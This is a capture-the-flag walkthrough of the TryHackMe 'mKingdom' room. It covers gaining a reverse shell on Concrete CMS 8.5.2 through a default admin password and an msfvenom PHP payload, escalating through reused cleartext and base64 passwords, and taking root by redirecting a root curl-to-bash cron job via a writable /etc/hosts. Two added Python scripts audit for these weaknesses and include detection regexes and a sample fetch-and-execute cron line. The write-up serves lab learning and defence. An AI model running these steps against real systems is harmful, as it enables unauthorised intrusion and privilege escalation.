“mKingdom” TryHackMe Writeup

Ahmet AKYAZILI
7 min read · Jun 15, 2024


https://tryhackme.com/r/room/mkingdom

Today we will solve the TryHackMe room called mKingdom together.

NMAP Scan

As always, we start off with an NMAP scan:

Only one open port, 85, and it’s running HTTP.

Let’s take a look at the website:

Nothing here and nothing in the source code as well.

And a dirb scan:

Dirb locates the /app directory, let’s take a closer look:

We see a single button here, clicking on it pops up an alert:

After we hit “OK”, we are redirected to “/app/castle”.

The Wappalyzer browser add-on identifies this as “Concrete CMS 8.5.2”:

The next step would be to search for any known exploits for this version of Concrete:

The first result reveals an RCE vulnerability, let’s check that out:

Bingo, the version is the exact one used on this website. However, it seems like we need to take over the admin account first in order for the exploit to work.

Let’s see if we can identify the location of the login page.

If you scroll all the way down to the bottom of the page, you will see a link to the login page:

I searched for default credentials for Concrete CMS and found that the default username is “admin”:

I decided to try some common credentials like “admin:admin” and “admin:password”.

With “admin:password” we get logged in:

Now, let’s go back to the exploit and understand how it works:

To summarize, we need to make sure that we are allowed to upload PHP files, then upload a PHP reverse shell and navigate to it to execute it!

First, go to “System & Settings” on the sidebar at the right of the screen. Next, under “Files”, go to “Allowed file types”:

Add “php” to the Allowed File Types:

Hit “Save” and navigate to “Files” on the sidebar:

And hit “upload files”:

Now we need to generate our PHP shell (I will paste the full PHP shell below), or we can generate one with Metasploit’s msfvenom using the following command:

msfvenom -p php/reverse_php LHOST=<attacker machine IP> LPORT=1234 > shell.php

After you hit “Close”, you will be provided with a link to the PHP file:

Make sure you have a listener ready (“nc -nvlp 1234”), and click on the link:

And we have a shell on the machine!

Privilege Escalation

First, we download the “linpeas” script to the /temp folder with the wget command and run it.

Let’s see what other users exist:

We have the users root, mario and toad.

Let’s see if we can find a way to escalate to one of these users.

Looking around, I end up finding the following file in the “Backup Manager files” section of the linpeas output:

/var/www/html/app/castle/application/config/database.php:

We find a cleartext password. The username for the connection is “toad”, and we know that there is a user on the machine that goes by the same name, so maybe he re-used his password?

Bingo! Privilege escalation to toad is done.

Toad to Mario

I ran linpeas again, and noticed something weird in the environment variables of toad:

PWD_token is interesting…

The value looks like base64, so we can decode it with CyberChef:

We have another password!

We can switch users to mario with this password:
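A password sitting in an environment variable, base64-wrapped or not, is exactly what a host audit should catch before an attacker does. The following Python script is an added example (not from the writeup or the room) that scans an environment map for credential-looking variable names and reports whether each value is plain text or base64 that decodes to readable text. The environment dictionary is constructed; the room’s actual token value is deliberately not reproduced. On a live system you would pass os.environ or the parsed contents of a process’s /proc/<pid>/environ instead.

```python
"""Spot credential-looking environment variables, including base64-wrapped ones (added example)."""
import base64
import re
import string

# Variable names that usually carry a secret; the writeup's PWD_token matches on "pwd" and "token".
_SECRET_NAME_RE = re.compile(r"pass|pwd|token|secret|cred|api[_-]?key", re.I)
_B64_RE = re.compile(r"[A-Za-z0-9+/]+={0,2}")
_PRINTABLE = set(string.printable) - set("\x0b\x0c")

# Constructed environment; the room's real token value is deliberately not reproduced.
SAMPLE_ENV = {
    "HOME": "/home/toad",
    "SHELL": "/bin/bash",
    "PWD_token": base64.b64encode(b"constructed-example-pass").decode(),
    "DB_PASSWORD": "plaintext-example",
    "TERM": "xterm-256color",
}


def try_base64(value):
    """Decode value if it is well-formed base64 of printable UTF-8 text; otherwise return None."""
    candidate = value.strip()
    if len(candidate) < 8 or len(candidate) % 4 or not _B64_RE.fullmatch(candidate):
        return None
    try:
        text = base64.b64decode(candidate, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None
    return text if text and all(ch in _PRINTABLE for ch in text) else None


def find_credential_like_env(env):
    """Return sorted (name, kind, revealed_value) tuples for variables whose name suggests a secret.
    kind is 'base64-wrapped' when the value decodes to readable text, otherwise 'plain'."""
    hits = []
    for name, value in env.items():
        if not value or not _SECRET_NAME_RE.search(name):
            continue
        decoded = try_base64(value)
        if decoded is not None:
            hits.append((name, "base64-wrapped", decoded))
        else:
            hits.append((name, "plain", value))
    return sorted(hits)


if __name__ == "__main__":
    for name, kind, revealed in find_credential_like_env(SAMPLE_ENV):
        print(f"{name}: {kind} -> {revealed!r}")
```

Base64 is an encoding, not protection: the check above treats a decodable value the same way it treats a plaintext one, which is the right mindset when reviewing shell profiles and service unit files for leftover credentials.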

Mario to ROOT

For the next step, we download the “pspy” binary from the following address, transfer it to the victim machine and run it.

https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64

This is a tool that allows you to monitor Linux processes in real time without requiring root privileges. This could allow us to spot cleartext passwords passed as command arguments, hidden cronjobs, etc.

If we run the tool on the machine and wait for a few minutes, we will see that there is a cronjob running as root every minute:

It seems like every minute, a file by the name of “counter.sh” gets pulled from mkingdom.thm , and executed with bash.

To exploit this, we would either need permissions to modify counter.sh or modify the /etc/hosts file:

We don’t have permission to modify counter.sh.

But we do have permission to modify /etc/hosts.

/etc/hosts acts as the local DNS mapping of the Linux server. Before the server reaches out to any DNS server to resolve a domain like “mkingdom.thm”, it checks whether there is an entry for that domain in /etc/hosts.

So, by modifying /etc/hosts so that mkingdom.thm is mapped to our Kali machine, we can make the cronjob pull the counter.sh script from our Kali machine and execute it with bash!
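From a defender’s perspective, two conditions make this chain work: a root cron job that fetches a script by hostname and pipes it straight into bash, and an /etc/hosts that a non-root user can write. The following Python script is an added example (not part of the original writeup or the room) that audits both: it parses system-crontab lines for fetch-and-execute commands, lists the hostnames those commands depend on (each of which /etc/hosts can override), and checks the mode bits of /etc/hosts. The crontab text and the mode value are constructed samples modelled on what the writeup describes, not copied from the machine.

```python
"""Audit for the two root-cron preconditions abused in this chain (added example)."""
import re
import stat
from dataclasses import dataclass

# Constructed sample crontab, modelled on the behaviour pspy revealed in the writeup;
# the exact cron line on the room's machine is not reproduced here.
SAMPLE_CRONTAB = """\
SHELL=/bin/bash
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
* * * * *       root    curl mkingdom.thm:85/app/castle/application/counter.sh | bash
"""
# Constructed st_mode for /etc/hosts; a world-writable hosts file is the misconfiguration the writeup uses.
SAMPLE_HOSTS_MODE = 0o100666

# 'curl ... | bash', 'wget -qO- ... | sudo sh', and 'bash <(curl ...)'
_PIPED_RE = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(bash|sh|zsh|python3?|perl|php)\b")
_SUBST_RE = re.compile(r"\b(bash|sh|zsh)\s+<\(\s*(curl|wget)\b")
# Hostnames in URL-like tokens: these resolve through /etc/hosts before any DNS server is asked.
_HOST_RE = re.compile(r"(?:https?://)?\b([a-z0-9-]+(?:\.[a-z0-9-]+)+)(?::\d+)?/", re.I)


@dataclass
class Finding:
    kind: str
    detail: str


def parse_cron_line(line):
    """Return (user, command) for a system-crontab entry, or None for comments, blank lines,
    variable assignments and malformed entries (@reboot-style lines are skipped)."""
    line = line.strip()
    if not line or line.startswith("#") or "=" in line.split()[0]:
        return None
    fields = line.split(None, 6)
    if len(fields) < 7 or fields[0].startswith("@"):
        return None
    return fields[5], fields[6]


def fetch_and_exec(command):
    """True when remote content is fetched and fed straight into an interpreter."""
    return bool(_PIPED_RE.search(command) or _SUBST_RE.search(command))


def hostnames_in(command):
    """Hostnames (not IP literals) the command fetches from; each one is overridable via /etc/hosts."""
    return [h for h in _HOST_RE.findall(command) if not re.fullmatch(r"[\d.]+", h)]


def hosts_file_writable_by_others(mode):
    """True if group or others may write the file (the default for /etc/hosts is 0644, root:root)."""
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit(cron_lines, hosts_mode):
    """Run both checks; an empty list means neither precondition of the chain holds."""
    findings = []
    for line in cron_lines:
        parsed = parse_cron_line(line)
        if parsed is None:
            continue
        user, command = parsed
        if fetch_and_exec(command):
            hosts = ", ".join(hostnames_in(command)) or "IP literal only"
            findings.append(Finding("cron_fetch_exec", f"{user}: {command} (resolves: {hosts})"))
    if hosts_file_writable_by_others(hosts_mode):
        findings.append(Finding("hosts_writable", f"/etc/hosts mode {oct(stat.S_IMODE(hosts_mode))}"))
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_CRONTAB.splitlines(), SAMPLE_HOSTS_MODE):
        print(finding.kind, "-", finding.detail)
```

On a real host you would feed it the lines of /etc/crontab and the files under /etc/cron.d together with os.stat("/etc/hosts").st_mode. Either finding on its own is worth fixing: a cron job should not pipe remote content into a shell at all (fetch to a file, verify a signature or checksum, then run), and /etc/hosts should be mode 0644 and owned by root so that name resolution cannot be redirected by an unprivileged user.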

First, let’s modify /etc/hosts:

On the Kali machine, we set up the exact same directory structure:

And inside “application” we will place “counter.sh” with the following content:

This is a simple reverse shell payload.

Don’t forget to set up a listener.

Then we start a Python HTTP server on port 85 from the parent directory of “app”:

And after one minute we see a GET request being made, grabbing our counter.sh.

And when we check our listener:

And we are ROOT!

The flags can be found at /root/root.txt and /home/mario/user.txt.

